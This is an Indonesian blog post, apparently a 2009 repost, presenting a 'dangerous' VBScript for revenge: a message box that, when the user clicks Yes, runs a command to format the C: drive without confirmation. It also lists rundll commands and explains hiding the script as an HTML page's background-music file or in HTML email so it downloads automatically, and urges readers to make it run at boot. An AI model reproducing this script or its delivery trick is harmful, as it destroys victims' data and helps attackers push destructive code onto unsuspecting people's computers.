vbs sederhana yang berbahaya

sebelumnya saya beritahukan  yang membuat coding ini adalah Istanto@gmail.com bukan lah saya. tetapi saya hanya menulis ulang dan mendistribusikannya
Oke kita buat VBS sederhana yang bisa buat balas dendam kesumat yah…. apa itu VBS? baca google yah.. mari kita mulai harap duduk yang manis barisan dirapatkan :p
Mulai Coding
————————————————————
Set WshShell = WScript.CreateObject(“WScript.Shell”)
X = MsgBox(“Halo dunia kadal_punk bertanya siapkah anda mengganti operating system anda ?”, vbYesNo, “Awas bahaya kadal ngga tanggung jawab!”)
If X = 6 Then
WshShell.Run(“format.com /y C:”)
End If
———————————————————-
itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P
Here sample command :
run.exe rundll user,#7
run.exe rundll user,#4
run.exe rundll user,#3
dan lain lain
nah…….. sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana? saya cuma kasi gambaran contoh simple html… loh om kadal tanya!! kalo html doang, orang ga buka websitenya gimana? waduh.. gimana yah.. tau ngga email yang pake HTML code? nah coba deh… ngerti kan maksud saya :p
———————————————————-
Hallo dunia apa kabar
Hallo dunia apa kabar :) muach
———————————————————-
baris di atas sebenarnya hanya manipulasi hehehe alias background music yang kita rubah ke file yang kita inginkan
dan yang jelas ini pasti otomatis terdownload ke dalam computer yang membuka halaman html ini kalo ngga percaya
liat aja status bar IE kamu pasti tuh ada :p saya kira sudah cukup jelas.. easy kan hehe ^^ masuk ke dalam folder
” \windows\temporary internet files ” pasti kamu ketemu VBS nya disana (INGAT INI DI WINDOWS 98, XP NYA BLOM TAU SAYAH :p)
sekarang tugas kalian hanyalah mengubah VBS di atas bagaimana kah caranya? agar waktu windows booting dia muncul di layar?
mana saya tau???? itu tugas kalian dan saya ngga bertanggung jawab atas perbuatan yang mencoba teknik ini saya hanya memberikan sedikit pembukaan agar bisa dipahami apa itu system dan bagaimana dia bekerja.

Sumber : http://chaerdevilzc0der.wordpress.com/2009/05/13/vbs-sederhana-yang-berbahaya/

0 komentar:

Posting Komentar